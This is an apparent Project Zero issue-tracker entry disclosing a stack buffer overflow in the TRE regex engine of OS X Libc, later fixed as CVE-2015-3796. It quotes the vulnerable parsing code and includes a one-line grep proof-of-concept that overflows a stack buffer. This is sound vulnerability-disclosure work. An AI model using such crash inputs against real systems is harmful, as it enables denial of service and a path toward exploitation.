New issue
Advanced search Search tips
Issue 428
Starred by 2 users
Status: Fixed
Owner:
ianbeer@google.com
Closed: Aug 2015
Cc:
project-...@google.com



Sign in to add a comment
 Stack buffer overflow in OS X regex engine (TRE)
Project Member Reported by ianbeer@google.com, Jun 4 2015 Back to list 
OS X Libc uses the slightly obscure TRE regex engine [ http://laurikari.net/tre/ ]

If used in enhanced mode (by passing the REG_ENHANCED flag to regcomp) TRE supports arbitrary-width hex literals. Here is the code used to parse them:

  /* Wide char. */
  char tmp[32];
  long val;
  int i = 0;
  ctx->re++;
  while (ctx->re_end - ctx->re >= 0)
    {
      if (ctx->re[0] == CHAR_RBRACE)
        break;
      if (tre_isxdigit_l(ctx->re[0], ctx->loc))
        {
    tmp[i] = (char)ctx->re[0];
    i++;
    ctx->re++;
    continue;
        }
      return REG_EBRACE;
    }

ctx->re points to the regex characters. This code blindly copies hex characters from the regex into the 32 byte stack buffer tmp until it encounters either a non-hex character or a '}'...

I'm still not sure exactly what's compiled with REG_ENHANCED but at least grep is; try this PoC on an OS X machine:

lldb -- grep "\\\\x{`perl -e 'print "A"x1000;'`}" /bin/bash

That should crash trying to read and write pointers near 0x4141414141414141

Severity Medium because I still need to find either a priv-esc or remote context in which you can control the regex when REG_ENHANCED is enabled.
Project Member Comment 1 by ianbeer@google.com, Jun 10 2015
Labels: Reported-2015-Jun-10 Id-623973242
Project Member Comment 2 by ianbeer@google.com, Aug 14 2015
Labels: CVE-2015-3796 Fixed-2015-Aug-13 Product-iOS
Status: Fixed
OS X advisory: https://support.apple.com/en-us/HT205031
iOS advisory: https://support.apple.com/en-us/HT205030
Project Member Comment 3 by ianbeer@google.com, Sep 21 2015
Labels: -Restrict-View-Commit
Sign in to add a comment